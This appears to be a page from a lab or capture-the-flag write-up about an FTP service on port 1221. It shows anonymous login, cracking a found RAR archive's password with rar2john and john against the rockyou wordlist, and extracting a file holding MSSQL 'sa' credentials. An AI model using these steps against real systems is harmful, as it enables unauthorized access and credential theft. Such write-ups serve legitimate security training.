3 :1221 ftp

$ ftp 192.168.175.70 1221
Connected to 192.168.175.70.
220 Microsoft FTP Service
Name (192.168.175.70:kashz): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> passive
Passive mode on.
ftp> dir
227 Entering Passive Mode (192,168,175,70,194,123).
125 Data connection already open; Transfer starting.
04-27-20  07:02PM                18866 Elementum Supremum.docx
04-27-20  07:02PM               764176 file_example_MP3_700KB.mp3
04-27-20  07:02PM                15690 img.jpg
04-27-20  07:02PM                  302 MSSQL_BAK.rar
04-27-20  07:02PM                  548 palindromes.txt
04-27-20  07:02PM                45369 server.jpg
226 Transfer complete.

$ rar2john MSSQL_BAK.rar > rarhash

$ john --wordlist=/usr/share/wordlists/rockyou.txt rarhash
Using default input encoding: UTF-8
Loaded 1 password hash (RAR5 [PBKDF2-SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
letmeinplease    (MSSQL_BAK.rar)
1g 0:00:00:42 DONE (2021-08-23 13:37) 0.02354g/s 3273p/s 3273c/s 3273C/s loveme93..laptop123
Use the "--show" option to display all of the cracked passwords reliably
Session completed

$ unrar x MSSQL_BAK.rar
UNRAR 6.02 freeware      Copyright (c) 1993-2021 Alexander Roshal
Enter password (will not be echoed) for MSSQL_BAK.rar:
Extracting from MSSQL_BAK.rar
Extracting  mssql_backup.txt                                          OK
All OK

$ cat mssql_backup.txt
Username: sa
Password: EjectFrailtyThorn425
Previous4 :1435 ms-sql 2017 Next2 :80 IIS 10.0
Last updated 2 years ago